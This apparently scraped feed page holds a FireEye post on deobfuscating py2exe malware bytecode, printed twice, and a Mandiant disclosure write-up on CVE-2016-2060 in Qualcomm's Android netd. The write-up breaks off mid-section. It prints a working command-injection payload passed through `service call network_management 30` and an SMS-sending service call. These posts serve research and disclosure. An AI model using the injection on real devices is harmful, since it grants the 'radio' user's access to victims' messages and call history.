 4f837a3eee0a228c1c7cb13916f14fe8

 4fad9557973f3451be04efbbf9f51b8d

 4faefac63b3876604945f11effc6042a

 5044a06f037118627899abd1229895fe

 50aa9c662a508c9a9bda508bbb5b4ac7

 50cccf3ee065977de3a2c07249313411

 512c580db356e18c51b051a7b04fa0c1

 5144790d272daacc7210fc9e2ae41f12

 516d74358ef2f61fbb90e9d1a17f59f9

 52c5cc858d528fd0554ef800d16e0f8f

 53281564e50a8dfab1d7d068f5f3bae3

 53baf60ae4611b844e54a600f05c9bbf

 5510c69693819baf9ad2e4a346f805b0

 5527ffe6768f3b61d69ee83039f6e487

 5678e4c2cfe9c2bd25cde662b026550e

 56d95aa243571ccd85b516d0f393ed37

 56dedd0ca8849891486e23a53acb66ed

 5702f860032be6a67d5ead51191f90a8

 57343fd964265e6472e87a4f6c626763

 5814b9a4b3f10abe74b61901ee151a9f

 5a95d673b2c2d758c7d456c421ba1719

 5b6c7341a08f5cd4c27f443e3c057dd1

 5b7b1c1d3102a04e88ddfe8f27ffa2f2

 5bc0678baa1f30b89b80dcc7cf4431dc

 5c318b3ba77d0052427c7bffeb02a09f

 5de94bc0c4cc183c0ee5a48a7ae5ae43

 5e47b31cf973beba682c2973ed3dc787

 5e5f6b1fe260475872192d2ec3cb1462

 5e9773741a5e18672664121f8e5f4191

 5f08343486e42a0f8db0c0647c8255d1

 609e0b1940d034b6d222138e312c8dd2

 60b89dc654ed71053466b6c1f9bec260

 6148b71d713c80af2acfd3506d72a7a4

 6179d744808ad893dabb7b7de6b4a488

 619dade7c5a7444397b25c8e9a477e96

 61e67e7f1e2644bb559902ba90e438a5

 62186f41850c54a46252a7291060760d

 64c2cbc4bfd487e30f7b925fbbc751b0

 65eab2ed600f5ae45fe916a573ce72b0

 66e9dca8bb42dd41684c961951557109

 67fe7190cefc9dad506ed3c1734ff708

 692989b9681f80e9051359d15ec2297f

 6ae2e0ed9ae6dca4ea1ba71ae287406c

 6de02d603b741c7a5fc949952088f567

 6e2b5af3acf5306d8ac264a47193fe49

 6ee8919bd388494e5694b39ae24bd484

 6ef671cfdf28c7252db1c451ca37ec9a

 70122f367b82c8dd489b0fafa32d0362

 7064de8a83750bd1b38c23324b3757e3

 7089021c4ac0a7f38d52206653070af9

 7211a069239cb354c6029f963c2a5f06

 73d14b09f12eca5af555e5d205808064

 7511ed572f555af27c47f2a02b64302d

 75aab55e822bbca87f60970d37c8d7b3

 75d87e15a789770c242fec0867359588

 75e18289c8e9cc484e7e43ca656be24a

 76546e44fe4761503cb807a8d96a6719

 766084da85eab06dc639a62ff381b541

 778cc7e83ad27c92f30cea519989f47b

 788f75bf8f1330ec78d5d454bf88d17f

 79736c03eeda35ab7c3b6656048c0247

 7b853f8219384485b8753a58259ad171

 7c3e5bace659e9ddf7444b744a8667e9

 7d1c2d11a9b68a107ffb32c86675d8e9

 7d91f480e5a0c4372a43103f678eb328

 7e0671fc66f9a482000414212bf725e3

 7f79a0ccc91f654de59c361af1964354

 80a80e9f0b241ab3d0d9febab34d0e56

 822c9b26e833e83790433895fe7e2d3b

 836e64f3e9046e08cdf66b944718e48b

 83e4610c9500a48b8d1721c11e5797e2

 84354edd9292441aeed05c548fdaed7c

 84d600d85a061fa137e4b8fc82e1de2f

 851953bee7687d96891f45f24297a50b

 8599910e19552c9aa26db7be3e04be55

 859e9dbcbd0db577ff401537ae560e74

 85d866a99d6b130cbdde3949c015fec4

 86484d0e432e8c7e8f1b213413157138

 8895d772158f5456a80a2093aad516a2

 895a3b66c76c169b02843468062b1c5d

 895ef967c9ee97c5b9f3bdc426f6ad0f

 898683c4f39ad83f53f38460e170fd77

 8a0aae077c62d37ba9aeed2ad441dcf3

 8a5c4d1d946a01b56f180c930438c1e9

 8b56c493375d3b65d509793751509ba5

 8ceb4223e6238955fa7e154a794d5d04

 8d7c7392767415031d9ded205f0b29ef

 8dadd1162d01911160a5dbcdf081c5ba

 8e1207efd35f03caf74fdff314368da9

 8e5e0eb98e813371653b09864d4fc76a

 8f0243b5077bdb23baa1ceeedc697ff0

 8f11770349001409163245422b8d4442

 8f1fa31155a38ce3d6bc0fba43a82362

 90366f0731b60cf0c9959f06509d9ff5

 91a2746500d253633dd953692183fd76

 91c6a4e86d72c60beef95b75f9b4be82

 93323852f58c4e1b436a671651cc4998

 93b8d4d9704c13d983cf99a1296259d2

 940981070911dee2e2818216047d2ecb

 9461365a2bed17fb5b41536bf07ba165

 95921f248cd912e301c6b04120714d1f

 960d7dfa6f9c110732c34025687d5b60

 9621369183946ebb60d9959828dd5e16

 97cbd88d4414b41939571e994add3756

 99236003238f8ee88b5c4c8d02fdd17d

 9ab4cbd602ad8e5434e863bf0d84be2f

 9ba65c06057c179efbc8a62f86f2db71

 9bdb39a159774154fabc23d06ad8d131

 9c3ba2e8d172253e9d8ce30735bfbf78

 9cf27a07e0a4a6f6b1a8958241a6a83f

 9e173831c7f300e9dca9ee8725a34c5a

 9e7d24027621c0ecfd13995f2e098e8c

 9f723da52e774a6c5d03d8ba5f6af51f

 a0c486b879e20d5ac1774736b48e832b

 a152ea9ee04ca9790d195f9f3209b24a

 a1803ced57c1917f642ed407fc006659

 a1c504f51654200e6d0e424f38700f14

 a1d5f30ea6fc30d611c2636da4e763d4

 a1e7602b96d78fc37b5e1d271dbab273

 a2c5ffc33a96c6b10ae9afdaf5d00e62

 a31adc93ea76a4e2dfb6ae199fc0a294

 a3aaff686bf34d60b8319ef2525387d3

 a3ecea301bbe612ef9e17a502ee94b21

 a44b5c01378dd89c1c17565736f6c47b

 a4c8b0199f92f9be7b482df2bcce8162

 a4cba22ecfa33d1a4ad69be4616eeaf7

 a4f19520957bee3d68755a3978fb16be

 a61d0ea6e5711135383a3592e6b31e49

 a639338fd99cfd50292425d36618074c

 a6c5d89df0774fdd1643080548bfe718

 a893d3cfce6e8869b35a8140089ec854

 a8f2d507661b76a94971dcf7d593fc8a

 a9776f2633565419e55f6842a0b74278

 a9ce99d1788c13edaa3fb7f92ebb1240

 aa48cd40fcfe561bb5cd274549c94d6f

 aa5216ce42e1c279042662c018509140

 aa735ae056b57471bbe3499517afd057

 ac6a922fd8c604eb56da5413c2368be7

 ac8ad3eb56d2a94db30d3f4acfe4b548

 acfc48ed626369cf0fb6e1872c92e1bd

 ad75d090f865cbab68c411682ad2eb89

 ad99f483836492e34c072764db219fe4

 addd10c396fb3c1998ea451710f6f6f6

 aea04d46b9a4097155afcb3a80aafb8f

 af60a1f801ee3d5ba256c9354d8e9ca3

 af732879ff0b20eb02386a16581c8a4b

 afbfbb0fc1e7cbf56732d2afaeb21302

 b0737a9732647803bab45e64b4dc8f42

 b11bb0abd2a72e0ca88fe9817d42e139

 b2e0eae1d879287da6155ffa1ffff440

 b371fd7024687fa205135e2f3425822d

 b4298ce2eab75b9729ae3ac54e44e4d1

 b536f2134d75a4ac257071615e227a7d

 b56b456488358fcdc0ce95df7e0309cf

 b57618a7098fa9fcc14b8779b71ba62a

 b5afb1b35f7ee56218ee1c0d6ba92fb7

 b5f1fe0ab8ef34d6429916b6257e682b

 b66eb248e1ca0c35bc7e518fa4d5757a

 b6f52abceb49c6d38e29de6951f768fa

 b7343a1094f139699bc4698343d2b7ad

 b80f53f44e737aa1ecc40a1c5cf10a5d

 b9057cc24a9d4bde42198d3956ee46e6

 b9680d7e427bc2a3ed0320fb15023a88

 ba1c5315933c1a4d446bf90eb9d7c8c6

 bbb20fe1b97f12934b70cb1a7d2399d4

 bbfac3011f9e3b239e4eb9f9d6b82763

 bcd595f9eb7fba9fa82c21805ebb1535

 bd8c50221e6ec939f7b4df54795bca20

 bd9ebb6baf95d25fc54568bb4c37567b

 bddd52910f0c40b538418144ae0b63ac

 bde66ebf8cd08b301b0b6c3140df5fed

 be10e76060c3bbc59c1d87bdc3abeb12

 c23c4130ffebf9ffe60136b7099f8603

 c2eb3eed3f2082cf05e7c785cfab5487

 c36230f577cfa4d25e29be00ada59d91

 c39f6e984efcbf40612a3acb780b638a

 c528caa8cffd76825748507b8b0ad03e

 c5dd6c26c4c1e03fd1ec51cb1dec91ca

 c620fef9ebfa83e84c51134d14d44ec8

0c3dbcffb91d154b2b320b2fce972f39

27660806ff465edbe0f285ab67a9a348

36966643d45c09afb42a40fa6f71b38c

458a8c5f99417f5031885116e40117ae

4aebe1ff92fad7c4dba9f8a26b6a61d3

551f94100c04ed328ddeaf4817734eb5

6fb3c026537a0248f4ef40b98a9f1821

acf114610271e97cb58b172d135564bb

ccabfa1d72797c635eb241f82a892e22

cf5451b8b53092266321a421ba9224ca

d5ea3a22bce77e4bc279ca7903c3288a

d8caad151e07025fdbf5f3c26e3ceaff

eb7d7dacebba8741c2d483f0fcabdc82

 

Deobfuscating Python Bytecode

$
0
0
Introduction

During an investigation, the FLARE team came across an interesting Python malware sample (MD5: 61a9f80612d3f7566db5bdf37bbf22cf ) that is packaged using py2exe. Py2exe is a popular way to compile and package Python scripts into executables. When we encounter this type of malware we typically just decompile and read the Python source code. However, this malware was different, it had its bytecode manipulated to prevent it from being decompiled easily!

In this blog we’ll analyze the malware and show how we removed the obfuscation, which allowed us to produce a clean decompile. Here we release source code to our bytecode_graph module to help you analyze obfuscated Python bytecode (https://github.com/fireeye/flare-bytecode_graph). This module allows you to remove instructions from a bytecode stream, refactor offsets and generate a new code object that can be further analyzed.

Background

Py2exe is a utility that turns a Python script into an executable, which allows it to run on a system without a Python interpreter installed. Analyzing a Py2exe binary is generally a straightforward process that starts with extracting the Python bytecode followed by decompiling the code object with a module such as meta or uncompyle2. Appendix A contains an example script that demonstrates how to extract a code object from a Py2exe binary.

When attempting to decompile this sample using uncompyle2, the exception shown in Figure 1 is generated. The exception suggests the bytecode stream contains code sequences that the decompiler is not expecting.


Figure 1: Uncompyle2 exception trace

Obfuscation that breaks decompilers

To understand why the decompiler is failing, we first need to take a closer look at the bytecode disassembly. A simple method to disassemble Python bytecode is to use the built-in module dis. When using the dis module, it is important to use the same version of Python as the bytecode to get an accurate disassembly. Figure 2 contains an example interactive session that disassembles the script “import sys”. Each line in the disassembly output contains an optional line number, followed by the bytecode offset and finally the bytecode instruction mnemonic and any arguments.

Figure 2:  Example bytecode disassembly

Using the example script from Appendix A, we can view the disassembly of the code object to get a better idea what is causing the decompiler to fail. Figure 3 contains a portion of the disassembly produced by running script on this sample.

Figure 3: Bytecode disassembly

Looking closer at the disassembly, notice there are several unnecessary bytecode sequences that have no effect on the logic of the code. This suggests that a standard compiler did not produce the bytecode. The first surprising bytecode construct is the use of NOPs, for example, found at bytecode offset 0. The NOP instruction is not typically included in compiled Python code because the interpreter does not have to deal with pipelining issues. The second surprising bytecode construct is the series of ROT_TWO and ROT_THREE instructions. The ROT_TWO instruction rotates the top two stack items and the ROT_THREE rotates the top three stack items. By calling two successive ROT_TWO or three ROT_THREE instructions, the stack is returned to the same state as before the instruction sequence. So, these sequences have no effect on the logic of the code, but may confuse decompilers. Lastly, the LOAD_CONST and POP_TOP combinations are unnecessary. The LOAD_CONST instruction pushes a constant onto the stack while the POP_TOP removes it. This again leaves the stack in its original state.

These unnecessary code sequences prevent decompiling bytecode using modules such as meta and uncompyle2. Many of the ROT_TWO and ROT_THREE sequences operate on an empty stack that generates errors when inspected because both modules use a Python List object to simulate the runtime stack. A pop operation on the empty list generates exceptions that halt the decompilation process. In contrast, when Python interpreter executes the bytecode, no checks are made on the stack before performing operations on it. Take for example ROT_TWO from ceval.c in Figure 4.        

Figure 4: ROT_TWO source

Looking at the macro definitions for TOP, SECOND, SET_TOP and SET_SECOND from ceval.c in Figure 5, the lack of sanity checks allow these code sequences to execute without stopping.

Figure 5: Macro definitions

The NOPs and LOAD_CONST/POP_TOP sequences stop the decompilation process in situations where the next or previous instructions are expected to be a specific value. An example debug trace for uncompyle2 is shown in Figure 6 where the previous instruction is expected to be a jump or a return.

Removing the obfuscation

Now that the types of obfuscation have been identified, the next step is to clean the bytecode in hopes of getting a successful decompile. The opmap dictionary from the dis module is very helpful when manipulating bytecode streams. When using opmap, instructions can be referenced by name rather than a specific bytecode value. For example, the NOP bytecode binary value is available with dis.opmap[‘NOP’].

Appendix B contains an example script that replaces the ROT_TWO, ROT_THREE and LOAD_CONST/POP_TOP sequences with NOP instructions and creates a new code object. The disassembly produced from running the script in Appendix A on the malware is shown in Figure 6.

Figure 6: Clean disassembly

At this point, the disassembly is somewhat easier to read with the unnecessary instruction sequences replaced with NOPs, but the bytecode still fails to decompile. The failure is due how uncompyle2 and meta deal with exceptions. The problem is demonstrated in Figure 7 with a simple script that includes an exception handler.

Figure 7: Exception handler

In Figure 7, the exception handler is created using the SETUP_EXCEPT instruction at offset 0 with the handler code beginning at offset 13 with the three POP_TOP instructions. Both the meta and uncompyle2 modules inspect the instruction prior to the exception handler to verify it is a jump instruction. If the instruction isn’t a jump, the decompile process is halted. In the case of this malware, the instruction is a NOP because of the obfuscation instructions were removed.

At this point, to get a successful decompile, we have two options. First, we can reorder instructions to make sure they are where the decompiler expects them. Alternatively, we can remove all the NOP instructions. Both strategies can be complicated and tedious because absolute and relative addresses for any jump instructions need to also be updated. This is where the bytecode_graph module comes in.  Using the bytecode_graph module, it’s easy to replace and remove instructions from a bytecode stream and generate a new stream with offsets automatically updated accordingly. Figure 8 shows an example function that uses the bytecode_graph module to remove all NOP instructions from a code object.

Figure 8: Example bytecode_graph removing NOP instructions

Summary

In this blog I’ve demonstrated how to remove a simple obfuscation from a Python code object using the bytecode_graph module. I think you’ll find it easy to use and a perfect tool for dealing with tricky py2exe samples. You can download bytecode_graph via pip (pip install bytecode-graph) or from the FLARE team’s Github page: https://github.com/fireeye/flare-bytecode_graph.

An example script that removes the obfuscation discussed in this blog can be found here: https://github.com/fireeye/flare-bytecode_graph/blob/master/examples/bytecode_deobf_blog.py.Hashes identified that implement this bytecode obfuscation:

        61a9f80612d3f7566db5bdf37bbf22cf
        ff720db99531767907c943b62d39c06d
        aad6c679b7046e568d6591ab2bc76360
        ba7d3868cb7350fddb903c7f5f07af85

Appendix A: Python script to extract and disassemble Py2exe resource

Appendix B: Sample script to remove obfuscation


Deobfuscating Python Bytecode

$
0
0
Introduction

During an investigation, the FLARE team came across an interesting Python malware sample (MD5: 61a9f80612d3f7566db5bdf37bbf22cf ) that is packaged using py2exe. Py2exe is a popular way to compile and package Python scripts into executables. When we encounter this type of malware we typically just decompile and read the Python source code. However, this malware was different, it had its bytecode manipulated to prevent it from being decompiled easily!

In this blog we’ll analyze the malware and show how we removed the obfuscation, which allowed us to produce a clean decompile. Here we release source code to our bytecode_graph module to help you analyze obfuscated Python bytecode (https://github.com/fireeye/flare-bytecode_graph). This module allows you to remove instructions from a bytecode stream, refactor offsets and generate a new code object that can be further analyzed.

Background

Py2exe is a utility that turns a Python script into an executable, which allows it to run on a system without a Python interpreter installed. Analyzing a Py2exe binary is generally a straightforward process that starts with extracting the Python bytecode followed by decompiling the code object with a module such as meta or uncompyle2. Appendix A contains an example script that demonstrates how to extract a code object from a Py2exe binary.

When attempting to decompile this sample using uncompyle2, the exception shown in Figure 1 is generated. The exception suggests the bytecode stream contains code sequences that the decompiler is not expecting.


Figure 1: Uncompyle2 exception trace

Obfuscation that breaks decompilers

To understand why the decompiler is failing, we first need to take a closer look at the bytecode disassembly. A simple method to disassemble Python bytecode is to use the built-in module dis. When using the dis module, it is important to use the same version of Python as the bytecode to get an accurate disassembly. Figure 2 contains an example interactive session that disassembles the script “import sys”. Each line in the disassembly output contains an optional line number, followed by the bytecode offset and finally the bytecode instruction mnemonic and any arguments.

Figure 2:  Example bytecode disassembly

Using the example script from Appendix A, we can view the disassembly of the code object to get a better idea what is causing the decompiler to fail. Figure 3 contains a portion of the disassembly produced by running script on this sample.

Figure 3: Bytecode disassembly

Looking closer at the disassembly, notice there are several unnecessary bytecode sequences that have no effect on the logic of the code. This suggests that a standard compiler did not produce the bytecode. The first surprising bytecode construct is the use of NOPs, for example, found at bytecode offset 0. The NOP instruction is not typically included in compiled Python code because the interpreter does not have to deal with pipelining issues. The second surprising bytecode construct is the series of ROT_TWO and ROT_THREE instructions. The ROT_TWO instruction rotates the top two stack items and the ROT_THREE rotates the top three stack items. By calling two successive ROT_TWO or three ROT_THREE instructions, the stack is returned to the same state as before the instruction sequence. So, these sequences have no effect on the logic of the code, but may confuse decompilers. Lastly, the LOAD_CONST and POP_TOP combinations are unnecessary. The LOAD_CONST instruction pushes a constant onto the stack while the POP_TOP removes it. This again leaves the stack in its original state.

These unnecessary code sequences prevent decompiling bytecode using modules such as meta and uncompyle2. Many of the ROT_TWO and ROT_THREE sequences operate on an empty stack that generates errors when inspected because both modules use a Python List object to simulate the runtime stack. A pop operation on the empty list generates exceptions that halt the decompilation process. In contrast, when Python interpreter executes the bytecode, no checks are made on the stack before performing operations on it. Take for example ROT_TWO from ceval.c in Figure 4.        

Figure 4: ROT_TWO source

Looking at the macro definitions for TOP, SECOND, SET_TOP and SET_SECOND from ceval.c in Figure 5, the lack of sanity checks allow these code sequences to execute without stopping.

Figure 5: Macro definitions

The NOPs and LOAD_CONST/POP_TOP sequences stop the decompilation process in situations where the next or previous instructions are expected to be a specific value. An example debug trace for uncompyle2 is shown in Figure 6 where the previous instruction is expected to be a jump or a return.

Removing the obfuscation

Now that the types of obfuscation have been identified, the next step is to clean the bytecode in hopes of getting a successful decompile. The opmap dictionary from the dis module is very helpful when manipulating bytecode streams. When using opmap, instructions can be referenced by name rather than a specific bytecode value. For example, the NOP bytecode binary value is available with dis.opmap[‘NOP’].

Appendix B contains an example script that replaces the ROT_TWO, ROT_THREE and LOAD_CONST/POP_TOP sequences with NOP instructions and creates a new code object. The disassembly produced from running the script in Appendix A on the malware is shown in Figure 6.

Figure 6: Clean disassembly

At this point, the disassembly is somewhat easier to read with the unnecessary instruction sequences replaced with NOPs, but the bytecode still fails to decompile. The failure is due how uncompyle2 and meta deal with exceptions. The problem is demonstrated in Figure 7 with a simple script that includes an exception handler.

Figure 7: Exception handler

In Figure 7, the exception handler is created using the SETUP_EXCEPT instruction at offset 0 with the handler code beginning at offset 13 with the three POP_TOP instructions. Both the meta and uncompyle2 modules inspect the instruction prior to the exception handler to verify it is a jump instruction. If the instruction isn’t a jump, the decompile process is halted. In the case of this malware, the instruction is a NOP because of the obfuscation instructions were removed.

At this point, to get a successful decompile, we have two options. First, we can reorder instructions to make sure they are where the decompiler expects them. Alternatively, we can remove all the NOP instructions. Both strategies can be complicated and tedious because absolute and relative addresses for any jump instructions need to also be updated. This is where the bytecode_graph module comes in.  Using the bytecode_graph module, it’s easy to replace and remove instructions from a bytecode stream and generate a new stream with offsets automatically updated accordingly. Figure 8 shows an example function that uses the bytecode_graph module to remove all NOP instructions from a code object.

Figure 8: Example bytecode_graph removing NOP instructions

Summary

In this blog I’ve demonstrated how to remove a simple obfuscation from a Python code object using the bytecode_graph module. I think you’ll find it easy to use and a perfect tool for dealing with tricky py2exe samples. You can download bytecode_graph via pip (pip install bytecode-graph) or from the FLARE team’s Github page: https://github.com/fireeye/flare-bytecode_graph.

An example script that removes the obfuscation discussed in this blog can be found here: https://github.com/fireeye/flare-bytecode_graph/blob/master/examples/bytecode_deobf_blog.py.Hashes identified that implement this bytecode obfuscation:

        61a9f80612d3f7566db5bdf37bbf22cf
        ff720db99531767907c943b62d39c06d
        aad6c679b7046e568d6591ab2bc76360
        ba7d3868cb7350fddb903c7f5f07af85

Appendix A: Python script to extract and disassemble Py2exe resource

Appendix B: Sample script to remove obfuscation

Exploiting CVE-2016-2060 on Qualcomm Devices

$
0
0

Mandiant’s Red Team recently discovered a widespread vulnerability affecting Android devices that permits local privilege escalation to the built-in user “radio”, making it so an attacker can potentially perform activities such as viewing the victim’s SMS database and phone history. The vulnerability exists in a software package maintained by Qualcomm that is available from the Code Aurora Forum. It is published as CVE-2016-2060 and security advisory QCIR-2016-00001-1 on the Code Aurora Forum. We have provided general details in an FAQ, and a technical analysis of the vulnerability follows.

FAQ

What is CVE-2016-2060?

CVE-2016-2060 is a lack of input sanitization of the "interface" parameter of the "netd" daemon, a daemon that is part of the Android Open Source Project (AOSP). The vulnerability was introduced when Qualcomm provided new APIs as part of the "network_manager" system service, and subsequently the "netd" daemon, that allow additional tethering capabilities, possibly among other things. Qualcomm had modified the "netd" daemon.

How many devices are affected?

There is no solid answer. Since many flagship and non-flagship devices use Qualcomm chips and/or Qualcomm code, it is possible that hundreds of models are affected across the last five years. To provide some API numbers, Android Gingerbread (2.3.x) was released in 2011. This vulnerability was confirmed on devices running Lollipop (5.0), KitKat (4.4), and Jellybean MR2 (4.3), and the Git commit referenced in the post is Ice Cream Sandwich MR1 (4.0.3).

How is the issue being addressed?

Qualcomm has addressed the issue by patching the "netd" daemon. Qualcomm notified their customers (all of the OEMs) in early March 2016. The OEMs will now need to provide updates for their devices; however, many devices will likely never be patched.

FireEye reached out to Qualcomm in January 2016 and subsequently worked with the Qualcomm Product Security Team to coordinate this blog release and security advisory. When contacted by FireEye, Qualcomm was extremely responsive throughout the entire process. They fixed the issue within 90 days – a window they set, not FireEye. FireEye would like to thank Qualcomm for their cooperation throughout the disclosure and diligence with addressing the issues.

Google has included this issue in its May 2016 Android Security Bulletin.

How would an attacker exploit this vulnerability?

There are two ways to exploit this vulnerability, though this does not account for a determined attacker who possesses additional vulnerabilities. The first is to have physical access to an unlocked device, and the second is to have a user install a malicious application on the device.

Any application could interact with this API without triggering any alerts. Google Play will likely not flag it as malicious. It’s hard to believe that any antivirus would flag this threat. Additionally, the permission required to perform this is requested by millions of applications, so it wouldn't tip the user off that something is wrong.

What could an attacker do if they successfully exploit this vulnerability?

On older devices, the malicious application can extract the SMS database and phone call database, access the Internet, and perform any other capabilities allowed by the "radio" user. Some examples of potential capabilities of the "radio" user are presented in the blog itself, though it was difficult for all of these to be tested.

Newer devices are affected less. The malicious application can modify additional system properties maintained by the operating system. The impact here depends entirely on how the OEM is using the system property subsystem.

It should be noted that once the vulnerability is exploited, there is no indication to the user that something has happened. For example, there is no performance impact or risk of crashing the device.

Are only Android devices affected?

Since this is an open-source software package developed and made freely available by Qualcomm, people are using the code for a variety of projects, including Cyanogenmod (a fork of Android). The vulnerable APIs have been observed in a Git repository from 2011, indicating that someone was using this code at that time. This will make it particularly difficult to patch all affected devices, if not impossible.

Is this vulnerability being actively targeted or exploited?

No. The MTP team is monitoring usage of this API, but has not discovered anything.

Are FireEye customers protected?

FireEye MTP customers will be able to detect attempted exploitation of this vulnerability.

Technical Analysis

Next we will dive more deeply into CVE-2016-2060 and demonstrate how an attacker can exploit the vulnerability, but first an introduction to Android system services.

Understanding System Services

A system service is similar to a regular bound service found in an Android application, but a system service typically runs in a privileged process, such as the “mediaserver” or “system_server”. These services are the core of Android, and there are currently 99 system services registered on a default emulator build for Android Marshmallow. When USB debugging is enabled on a device, the `service` utility can be used to list system services registered on the device, shown in Figure 1.

Figure 1: Listing system services using 'service' utility

To illustrate how system services play a role on Android devices, we walk through the process of sending a text message (SMS) from an Android application. Figure 2 shows a Java snippet that can be used to send an SMS message with the content of “Test” to the number 1234567890:

        SmsManager smsManager = SmsManager.getDefault();
        smsManager.sendTextMessage(“1234567890”, null, “Test”, null, null);

Figure 2: Sending an SMS message from an application (from StackOverflow)

The code first obtains the SmsManager object associated with the default subscription ID using the static method “getDefault()”, and then calls the method “sendTextMessage(..)” with the appropriate arguments. The SmsManager class contains other SMS-related methods such as “downloadMultimediaMessage(..)” and “sendMultipartTextMessage(..)”.

Next, we’ll look at the Java source for the “sendTextMessage(..)” method of the SmsManager class used previously. For simplicity, we view the source for the SmsManager class included as part of Android 4.4 (“KitKat”), shown in Figure 3.

Figure 3: Java source of “sendTextMessage(..)” method

This method performs two functions: it first performs basic argument checking and then attempts to interact with a system service called “isms”. The “getService(..)” method of the ServiceManager class is used to obtain an IBinder object, which is then cast to an ISms object by using the “asInterface(..)” method. At this point, methods can be called from the “isms” system service using the Binder interface, which in this case is the method “sendText(..)”. Note that use of the ServiceManager class is not available to application developers using the Android SDK. This indicates that the SmsManager class is merely a wrapper for the “isms” system service, and this particular pattern is consistent across many other APIs such as location and telephony.

Calling System Services Directly

While Google does not recommend bypassing their official APIs to interact with a system service directly, it is possible to do so. To do this in an application, a developer has to import and use non-standard APIs (namely the aforementioned ServiceManager class). As an alternative, the `service` utility mentioned earlier can be used from the command line. In order to utilize the `service` utility, we need to gather additional pieces of information: the transaction ID of the method we would like to call and information regarding the arguments.

Obtaining a Transaction ID

When creating a bound Service in an Android application, the first step is to define the service interface using the Android Interface Definition Language (AIDL). When an AIDL file is compiled by the `aidl` utility during the application build process, a unique identifier is stored for each method of the interface in the form of a static field of the “Stub” inner-class. Developers rely on the method names and not these transaction IDs, as they will change between API builds and across vendors.

To illustrate this for the previous SMS example, we investigate the class “com.android.internal.telephony.Isms.Stub”, which is typically found on a device in the system JAR file “/system/framework/framework.jar”. By disassembling this JAR, we can determine the transaction ID for the method “sendText()”, which is 0xb hexadecimal or 11 decimal on this device, shown in Figure 4.

Figure 4: Obtaining the transaction ID of the “sendText(..)” method

Determining Method Arguments

Now that we understand the transaction ID, we need to determine how to interact with the method. If the system service of interest is public like the “isms” service, the AIDL source can be reviewed. If it is not, the service implementation needs to be reversed in order to determine the purpose of each argument. If we dissemble the inner-class “com.android.internal.telephony.Isms.Stub.Proxy” included in aforementioned “framework.jar”, we should be able to get an idea of what each of the augments represent and determine the return type. Figure 5 shows the arguments and return value for the “sendText(..)” method.

Figure 5: Method prototype of “sendText(..)” method

In the screenshot above we see that the “sendText(..)” method takes six arguments, denoted by the “pn” notation, and returns a void, as denoted by the trailing “V” in method prototype.

Putting it All Together

Now we can use the `service` utility to interact with the “isms” service and call the “sendText(..)” method. Figure 6 shows the syntax for the `service` utility to call a system service’s method.

    service call service_name transaction_id [arguments]

Figure 6: 'service

utility syntax to call service method

The 'service' utility accepts string, integer, and null value arguments, represented by “s16”, “i32”, and “null”, respectively. Note that for anything more complex, a Java application must be used. We can now call the “sendText(..)” method, which has the transaction ID of 11, of the “isms” system service to send a message, shown in Figure 7.

    adb shell service call isms 11 s16 "com.fake" s16 "1234567890" s16 "1234567890" s16 "Test" i32 0 i32 0

Figure 7: Invoking “sendText(..)” using 'service' utility

This command shown sends an SMS message with the content of “Test” to the number 1234567890, similar to the Java snippet in Figure 2.

Exploring CVE-2016-2060

Starting from the Top

Device manufactures and other non-Android Open Source Project (AOSP) vendors add and modify system services on a regular basis. From an attacker’s perspective, new or changed APIs in system services are a prime target. A researcher can enumerate these by comparing the static fields beginning with “TRANSACTION_” found within the “Stub” inner-class of system services on a target device to that of the AOSP. During one such review, we discovered two methods added to the “network_management” system service called “addUpstreamV6Interface(..)” and “removeUpstreamV6Interface(..)”, found in “android.os.INetworkManagementService.Stub”, which is part of the system JAR “/system/framework/framework.jar”. This is depicted in Figure 8 and Figure 9.

Figure 8: “addUpstreamV6Interface(..)” transaction ID 0x1e (30)

Figure 9: “removeUpstreamV6Interface(..)” transaction ID 0x1f (31)

The “addUpstreamV6Interface(..)” method accepts a single string argument, interface_value, and returns void. Viewing the disassembled method “addUpstreamV6Interface(..)” of the class “com.android.server.NetworkManagementService” found in the system JAR “/system/framework/services.jar” indicated that when called, the method passed interface_value to the native daemon “netd” by writing the string shown in Figure 10 to the UNIX socket “/dev/socket/netd”.

    tether interface add_upstream interface_value

Figure 10: Command sent to “netd” native daemon

From here, analysis of the “/system/bin/netd” indicated that this daemon executed “/system/bin/radish” using the “execv(..)” function which executes the shell command depicted in Figure 11.

    /system/bin/radish –i interface_value –x -t

Figure 11: Arguments passed to “/system/bin/radish”

The “/system/bin/radish” executable then passed the interface_value to the `brctl` utility using the “system(..)” function, using the syntax depicted in Figure 12.

    brctl addif bridge0 interface_value

Figure 12: interface_value present in `brctl` command

It is at this point we witness the code execution capabilities of CVE-2016-2060: any value passed to the “addUpstreamV6Interface(..)” is ultimately passed to the “system()” function without being sanitized or validated. A trivial example of this can be achieved with the `service` command shown in Figure 13, which prints the output of the `id` command to the Android log buffers:

    adb shell 'service call network_management 30 s16 '\''fake; log -t radio_exe "`id`"'\'''

Figure 13: 'service' command to write the output of 'id' to Android log buffers

This command passes the interface_value of '\''fake; log -t radio_exe "`id`"'\''' to the “/system/bin/radish” executable, which calls the “system()” function with the string shown in Figure 14.

    brctl addif bridge0 fake; log -t radio_exe "`id`"

Figure 14: Command injection into `brctl` “system()” function

We can check the Android log buffers to capture the output of our injected commands using the `logcat` utility, shown in Figure 15.

Figure 15: Output of 'id' captured in the Android log buffers

The output of the `id` command indicates that we are running as the Linux UID 1001 (“radio”) and under the SEAndroid context of “netd”. Next, we explore how an attacker would take advantage of this vulnerability and what actions this permits the attacker.

Practical Exploitation

The most feasible way of exploiting CVE-2016-2060 is by creating a malicious application. A malicious application needs only to request access to the “ACCESS_NETWORK_STATE” permission, a widely requested permission. Figure 16 shows how the “addUpstreamV6Interface(..)” method can be used to inject the command 'id'.

Figure 16: Malicious application calling “addUpstreamV6Interface(..)”

Since the commands above are executed as the user “radio”, data owned by applications that are also running as “radio” are accessible to the malicious application. On stock Android devices, this includes the Phone application and the Telephony Providers application, both of which contain sensitive information. The “radio” user also inherits several system permissions not accessible to a third-party application. A short list includes:

  • WRITE_SETTINGS_SECURE – Change key system settings
  • BLUETOOTH_ADMIN – Discover and pair with Bluetooth devices
  • WRITE_APN_SETTINGS – Change APN settings
  • DISABLE_KEYGUARD – Disable the key guard (lock screen)

Whether or not an attacker can abuse these permissions depends on the specific model, and may not be possible across all devices.

SEAndroid Considerations

